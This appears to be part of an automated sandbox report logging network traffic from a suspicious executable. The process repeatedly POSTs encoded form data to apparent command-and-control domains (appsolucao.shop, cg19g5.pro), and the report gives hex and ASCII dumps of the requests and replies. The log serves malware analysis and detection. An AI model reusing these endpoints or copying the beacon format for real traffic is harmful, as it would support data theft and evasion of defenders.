                                                                    Data Ascii: dpy4vDKP=ATFgxJujeTa7ukU4fC4YM84kHgKpHd6YXBvPAz9pyoW+CXbSLeS88jlmqSOIA0zYdIkPhmANyRKDVWTFH+hBeeYAA9evAbrSQOOewN1AvYxqyLmdX4RSI8AyNhGZKelLlwXiXy1oFRrZd/A8CsWBM3uZcByQg5mz2xQSAU6HsLSCpZeLj9kDytOKy3TuA3DtqI595Nc=


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    18192.168.2.84972784.32.84.32805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:46.756191015 CET806OUTPOST /qize/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.appsolucao.shop
                                                                    Origin: http://www.appsolucao.shop
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.appsolucao.shop/qize/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 41 54 46 67 78 4a 75 6a 65 54 61 37 76 46 6b 34 54 46 6b 59 64 63 34 6e 49 41 4b 70 4e 39 36 63 58 42 6a 50 41 78 52 35 79 64 47 2b 44 33 72 53 4b 62 6d 38 2f 6a 6c 6d 67 79 50 43 45 30 7a 54 64 49 59 39 68 6e 38 4e 79 52 32 44 56 58 6a 46 48 4a 4e 43 50 65 59 47 4d 64 65 70 45 62 72 53 51 4f 4f 65 77 4a 64 71 76 62 42 71 79 36 57 64 57 61 35 56 45 63 41 31 45 42 47 5a 63 75 6c 50 6c 77 58 55 58 7a 70 4f 46 58 6e 5a 64 2b 77 38 44 2b 2b 43 62 48 75 66 59 42 7a 53 6c 59 66 41 37 53 63 73 42 58 6d 47 6f 72 65 47 6f 76 76 68 35 66 73 46 78 74 6d 68 79 30 37 59 46 41 65 46 77 72 70 4e 6e 61 49 76 61 56 74 62 66 74 43 48 30 70 31 76 6d 32 55 4a 43 39 61 46
                                                                    Data Ascii: dpy4vDKP=ATFgxJujeTa7vFk4TFkYdc4nIAKpN96cXBjPAxR5ydG+D3rSKbm8/jlmgyPCE0zTdIY9hn8NyR2DVXjFHJNCPeYGMdepEbrSQOOewJdqvbBqy6WdWa5VEcA1EBGZculPlwXUXzpOFXnZd+w8D++CbHufYBzSlYfA7ScsBXmGoreGovvh5fsFxtmhy07YFAeFwrpNnaIvaVtbftCH0p1vm2UJC9aF


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    19192.168.2.84972884.32.84.32805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:49.414539099 CET1823OUTPOST /qize/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.appsolucao.shop
                                                                    Origin: http://www.appsolucao.shop
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.appsolucao.shop/qize/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 41 54 46 67 78 4a 75 6a 65 54 61 37 76 46 6b 34 54 46 6b 59 64 63 34 6e 49 41 4b 70 4e 39 36 63 58 42 6a 50 41 78 52 35 79 64 4f 2b 43 47 4c 53 46 63 36 38 2b 6a 6c 6d 2b 69 50 44 45 30 7a 30 64 49 42 32 68 6e 77 37 79 55 36 44 48 68 58 46 46 34 4e 43 57 4f 59 47 52 4e 65 73 41 62 71 49 51 4f 2b 61 77 4e 42 71 76 62 42 71 79 35 4f 64 66 6f 52 56 43 63 41 79 4e 68 47 56 4b 65 6c 72 6c 77 50 45 58 7a 74 34 46 6e 48 5a 64 65 67 38 46 4e 57 43 5a 6e 75 64 57 68 7a 77 6c 5a 6a 66 37 53 41 67 42 55 37 6a 6f 70 4f 47 71 65 58 34 74 4e 59 38 72 38 57 68 79 47 58 5a 45 51 4b 79 79 39 6b 2b 6c 4c 30 7a 53 52 68 42 65 73 4b 4b 2b 62 55 6a 35 48 6f 59 48 4b 54 62 6e 51 51 7a 71 65 50 32 62 4d 4c 53 2b 4b 6d 62 54 58 61 43 6d 4a 4a 6b 44 32 4d 61 75 52 58 4f 47 4d 5a 55 34 42 33 2f 38 65 32 46 50 46 58 35 50 32 72 37 6b 6d 46 46 47 6d 4a 6e 66 64 4a 4f 79 35 4c 30 67 68 77 45 44 6a 61 30 4a 71 57 67 31 30 6d 75 54 48 39 44 33 39 4e 74 59 31 46 4c 75 51 38 4b 30 68 35 38 77 42 59 57 45 [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=ATFgxJujeTa7vFk4TFkYdc4nIAKpN96cXBjPAxR5ydO+CGLSFc68+jlm+iPDE0z0dIB2hnw7yU6DHhXFF4NCWOYGRNesAbqIQO+awNBqvbBqy5OdfoRVCcAyNhGVKelrlwPEXzt4FnHZdeg8FNWCZnudWhzwlZjf7SAgBU7jopOGqeX4tNY8r8WhyGXZEQKyy9k+lL0zSRhBesKK+bUj5HoYHKTbnQQzqeP2bMLS+KmbTXaCmJJkD2MauRXOGMZU4B3/8e2FPFX5P2r7kmFFGmJnfdJOy5L0ghwEDja0JqWg10muTH9D39NtY1FLuQ8K0h58wBYWElR9kzIeUL6xKB3iPSuVoxeEJqbkSc/qje6h9mHsvwhFxtco5tAHfBAxuMxFYXx4859GiAdsccQyDlgsGQ1qlJvtj2Vho5H7IfvPZ8mnJGNCOAO/XGZh2IVI+txp3CgLCNaFykNfrR4jiw3gEp9eHbmUPuPSk7kE8KKKw/kkYhC4TFTTc+6wvtkzESUIPEGFB/1mpFjYcRMmdenGC1jLAefekbEynLTdI57V2X+8/akfg0TeYSaOqpgwCw9ZogHWtuV7YiM69nHr+uFPefzESqhLI8ycY4fY+V7QVWNZvAu1CDtcxLQq7ReqJAQo4cTw7dp0UWuhVE+Q1p+ETFvkUCp2r7ry5Dpc4nCTzYJp9UGuNtTzqLs8g+fSvqW+3cxHkesrv0PbIGKCiHl5tkb2Z3F7p2gdRtXZH//V2Aj33/It5eFHWWiFCAVfLsewamvuXXWr3USOt2GbP6Fj0QD+e6cZgDyNzGuZrIB+bUTjqJGzfURgmGj/Uc7SPNBSX+KTVt3pdWSGfpIxP6wV9KbwXtQs0R47UAe2V9ciU1CZRcLalNnbnuz+PtGzApSkAUBgOogAJB2Ytfh2RzTHqaE69VNdHxq3xF9wF6QysW7JgOz6Ynkx3TULKX9ExQzepZsV9HOtUV8MGRyooPbFGV5xubotL8Ko43JvLR+ [TRUNCATED]


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    20192.168.2.84972984.32.84.32805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:52.082525015 CET520OUTGET /qize/?dpy4vDKP=NRtAy8C1VD75jnw1HAYEMp1WIgG9E9qKUxnpBBxcw4/fMmuOK8aE1wx7hBeLP0HeQaV2gm8tylKSVkOWM4FJZ7IkG8aAGL63BqOI2MJdjYMIxaXVRLxlKq88LSTtWskGyQ==&t8=erepa0aHg HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Host: www.appsolucao.shop
                                                                    Connection: close
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Dec 5, 2024 09:44:53.167207003 CET1236INHTTP/1.1 200 OK
                                                                    Date: Thu, 05 Dec 2024 08:44:53 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 9973
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Server: hcdn
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    x-hcdn-request-id: 9de55f1c1d40b506406ccd9cbe953fb1-bos-edge1
                                                                    Expires: Thu, 05 Dec 2024 08:44:52 GMT
                                                                    Cache-Control: no-cache
                                                                    Accept-Ranges: bytes
                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                    Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                    Dec 5, 2024 09:44:53.167243004 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                    Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                    Dec 5, 2024 09:44:53.167256117 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                    Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                    Dec 5, 2024 09:44:53.167423010 CET672INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                    Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                    Dec 5, 2024 09:44:53.167434931 CET1236INData Raw: 79 6e 63 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 3d 77 69
                                                                    Data Ascii: ync></script><script>function gtag(){dataLayer.push(arguments)}window.dataLayer=window.dataLayer||[],gtag("js",new Date),gtag("config","UA-26575989-44")</script><nav class="navbar navbar-inverse"><div class=container-fluid style="padding:0 32p
                                                                    Dec 5, 2024 09:44:53.167452097 CET1236INData Raw: 2d 61 63 63 6f 75 6e 74 2d 70 61 67 65 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6e 74 61 69 6e 65 72 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73
                                                                    Data Ascii: -account-page><div class=container><div class="col-xs-12 top-container"><div class=message><h2 id=pathName><i></i></h2><div class=message-subtitle>Happy to see your domain with Hostinger!</div><p>Your domain is active and is using Hostinger na
                                                                    Dec 5, 2024 09:44:53.167464018 CET1236INData Raw: 66 6f 6c 6c 6f 77 3e 41 64 64 20 61 20 77 65 62 73 69 74 65 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77
                                                                    Data Ascii: follow>Add a website</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your
                                                                    Dec 5, 2024 09:44:53.167475939 CET1236INData Raw: 2b 33 38 29 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67
                                                                    Data Ascii: +38))}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal i
                                                                    Dec 5, 2024 09:44:53.167737961 CET988INData Raw: 28 6d 2d 3d 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29 29 3b 66 6f 72 28 69 3d 63 3d 79 2e 6c 65 6e 67 74 68 2c 30 3c 63 26 26 79 2e 70 75 73 68 28 22 2d 22 29 3b
                                                                    Data Ascii: (m-=(m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    21192.168.2.849730154.88.22.105805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:44:58.952228069 CET771OUTPOST /n6mr/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.cg19g5.pro
                                                                    Origin: http://www.cg19g5.pro
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 209
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.cg19g5.pro/n6mr/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 4c 4e 67 77 31 46 66 7a 39 56 77 47 6d 71 76 66 53 4a 6b 31 76 62 6b 74 2b 54 4d 62 43 70 49 4a 53 54 4c 33 31 6f 73 38 37 34 6d 76 57 4d 67 4f 2b 65 67 77 59 51 4a 41 70 57 69 6f 37 4f 55 41 35 61 37 55 4d 53 52 44 43 47 78 67 63 62 62 75 63 76 36 59 66 4e 4e 52 64 32 44 48 43 73 65 74 35 42 52 67 72 35 6c 38 6c 62 32 75 4a 54 67 43 2b 2f 75 61 46 38 6a 30 43 79 46 4a 50 2b 7a 61 34 52 72 52 4a 4f 37 6f 32 52 6c 41 66 2b 46 57 41 77 6b 37 79 41 4d 55 2f 67 6f 62 45 63 63 6d 55 55 39 35 6b 44 46 46 4d 46 61 37 38 70 58 2b 4e 38 43 6f 77 66 59 64 65 51 35 54 77 66 79 68 4d 56 6a 79 4d 57 73 3d
                                                                    Data Ascii: dpy4vDKP=LNgw1Ffz9VwGmqvfSJk1vbkt+TMbCpIJSTL31os874mvWMgO+egwYQJApWio7OUA5a7UMSRDCGxgcbbucv6YfNNRd2DHCset5BRgr5l8lb2uJTgC+/uaF8j0CyFJP+za4RrRJO7o2RlAf+FWAwk7yAMU/gobEccmUU95kDFFMFa78pX+N8CowfYdeQ5TwfyhMVjyMWs=
                                                                    Dec 5, 2024 09:45:00.463910103 CET364INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:45:00 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 99 91 59 5e 39 3e b9 7e 79 be e1 a6 65 7e c1 a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 eb 98 84 8b 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 67)N.,(ON,VPV/Ji%IAf>Y^9>~ye~f~Y&6PZ0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    22192.168.2.849731154.88.22.105805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:45:01.618776083 CET791OUTPOST /n6mr/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.cg19g5.pro
                                                                    Origin: http://www.cg19g5.pro
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 229
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.cg19g5.pro/n6mr/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 4c 4e 67 77 31 46 66 7a 39 56 77 47 6e 4a 33 66 51 71 4d 31 70 37 6b 73 78 7a 4d 62 55 5a 49 4e 53 54 48 33 31 70 5a 68 37 71 43 76 59 4e 51 4f 77 37 4d 77 62 51 4a 41 68 32 69 74 34 2b 55 62 35 61 33 32 4d 58 78 44 43 48 52 67 63 62 4c 75 63 38 43 62 66 64 4e 54 56 57 44 4a 47 73 65 74 35 42 52 67 72 35 67 62 6c 62 2b 75 4a 67 34 43 2f 62 79 5a 4d 63 6a 72 4b 53 46 4a 4c 2b 7a 57 34 52 72 7a 4a 50 58 43 32 58 68 41 66 37 35 57 44 6a 38 34 34 41 4e 52 69 51 6f 50 50 64 68 65 55 45 59 43 75 44 6c 47 4b 32 2b 68 30 2f 6d 55 58 65 4b 75 7a 66 77 32 65 54 52 6c 31 6f 76 4a 57 32 7a 43 53 42 36 35 65 42 66 6e 48 6f 65 77 50 46 50 4c 48 73 71 30 68 46 56 4f
                                                                    Data Ascii: dpy4vDKP=LNgw1Ffz9VwGnJ3fQqM1p7ksxzMbUZINSTH31pZh7qCvYNQOw7MwbQJAh2it4+Ub5a32MXxDCHRgcbLuc8CbfdNTVWDJGset5BRgr5gblb+uJg4C/byZMcjrKSFJL+zW4RrzJPXC2XhAf75WDj844ANRiQoPPdheUEYCuDlGK2+h0/mUXeKuzfw2eTRl1ovJW2zCSB65eBfnHoewPFPLHsq0hFVO
                                                                    Dec 5, 2024 09:45:03.128293037 CET364INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Thu, 05 Dec 2024 08:45:02 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Encoding: gzip
                                                                    Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 96 99 91 59 5e 39 3e b9 7e 79 be e1 a6 65 7e c1 a6 e5 c9 b9 16 66 7e 59 91 26 fe 81 b6 b6 ea 9a 36 fa 50 13 01 eb 98 84 8b 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 67)N.,(ON,VPV/Ji%IAf>Y^9>~ye~f~Y&6PZ0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    23192.168.2.849732154.88.22.105805952C:\Program Files (x86)\uMjttokpZIyYmEInOGZcVTtPctJsAZoYeSpqfVkrfLvdKXRkSqAkjPWIUoHXrLurkKwwLq\VdxisCThGA.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Dec 5, 2024 09:45:04.325186014 CET1808OUTPOST /n6mr/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Host: www.cg19g5.pro
                                                                    Origin: http://www.cg19g5.pro
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Content-Length: 1245
                                                                    Cache-Control: max-age=0
                                                                    Referer: http://www.cg19g5.pro/n6mr/
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0)
                                                                    Data Raw: 64 70 79 34 76 44 4b 50 3d 4c 4e 67 77 31 46 66 7a 39 56 77 47 6e 4a 33 66 51 71 4d 31 70 37 6b 73 78 7a 4d 62 55 5a 49 4e 53 54 48 33 31 70 5a 68 37 71 4b 76 59 37 4d 4f 2f 34 30 77 61 51 4a 41 76 57 69 73 34 2b 56 4c 35 62 66 79 4d 58 73 30 43 44 68 67 4f 6f 54 75 4c 39 43 62 47 74 4e 54 4b 6d 44 49 43 73 66 33 35 46 31 73 72 35 77 62 6c 62 2b 75 4a 68 49 43 35 50 75 5a 4b 63 6a 30 43 79 46 37 50 2b 79 2f 34 52 6a 4a 4a 50 54 34 33 6e 42 41 52 37 4a 57 46 51 59 34 77 41 4e 66 6a 51 70 49 50 64 74 42 55 45 56 73 75 44 51 6a 4b 32 47 68 6b 35 44 31 43 50 71 74 68 76 34 37 62 41 56 64 2b 59 54 35 58 30 2f 46 59 67 53 34 66 41 76 4e 4a 49 43 6b 50 31 72 4f 61 4c 61 63 6e 51 6f 30 39 42 79 55 38 65 32 41 69 47 32 37 4a 48 73 71 61 66 79 4a 31 61 66 75 6e 51 61 47 79 7a 36 30 4d 52 65 51 35 37 33 6b 31 2b 51 57 6f 51 55 66 41 73 64 52 78 56 69 49 4e 72 74 61 55 46 53 34 76 69 4e 39 2b 5a 4d 76 55 30 79 6e 48 78 33 4c 79 70 44 6e 43 36 54 63 37 44 59 68 53 73 41 62 54 59 62 76 4b 61 6e 50 46 41 4e 73 4a [TRUNCATED]
                                                                    Data Ascii: dpy4vDKP=LNgw1Ffz9VwGnJ3fQqM1p7ksxzMbUZINSTH31pZh7qKvY7MO/40waQJAvWis4+VL5bfyMXs0CDhgOoTuL9CbGtNTKmDICsf35F1sr5wblb+uJhIC5PuZKcj0CyF7P+y/4RjJJPT43nBAR7JWFQY4wANfjQpIPdtBUEVsuDQjK2Ghk5D1CPqthv47bAVd+YT5X0/FYgS4fAvNJICkP1rOaLacnQo09ByU8e2AiG27JHsqafyJ1afunQaGyz60MReQ573k1+QWoQUfAsdRxViINrtaUFS4viN9+ZMvU0ynHx3LypDnC6Tc7DYhSsAbTYbvKanPFANsJnxb6HkR3KRuP52+tQyh81j9GOKbsQerlJwwRCvHFJXFE+P2ACk/CPp4AJpXjiDkw+IinX+/eznSU5GmMFuo/T9ZFWxEmas0a+HrP1FMOayrWxTTbRZ//1Hd6H1BKR4FJNDqj5Nk8qz958J4ar9JE0pw4YDTyA421MQ857nBWXfBeX5SmrTpdBhnsZZgztpHkYB0XibEDusY581fyZ2ZTs0iqPypzOgRngxn0jLEFeQsjAin5zRG0DbtoOFnXicqjp/NjNpPrKJflsrtP5X8fCjjBEKbOXhI/Ide2mlGO4NKdmhO8MCvj5rzuD4DJM6lNsWSNjKrlnV8CH8RvF9DSIhPNWU65EjUdqR12Yqn+Ny/t4znAVZNr1N8001E/GW9is3VgslySbi9P7BwRtu8fDNgkXiuYc4ERvtNfAo8j0aAgS4XddK1crnAaTTJlPrweEzEtpy/7V8/tb/cmSi7gb2dvbQBU4pQVD3wad88RGW5IWhScU6pF15qQvUDLD0QAjEYJ7HooUn81PTlENeLn7+lxQ+T5GZtWqro3dlw5t3g1U/7ZpEwRI0e1lHWYwcoft4Web2JIvjnMgaaJs9xz1OVs+DkbX6JNSBA3STObld2CTVoZDK6sbN+Dt1ATfZmS3jgVDKMbGbbHXu9zauuRF/14bTxZ2oSwhU [TRUNCATED]


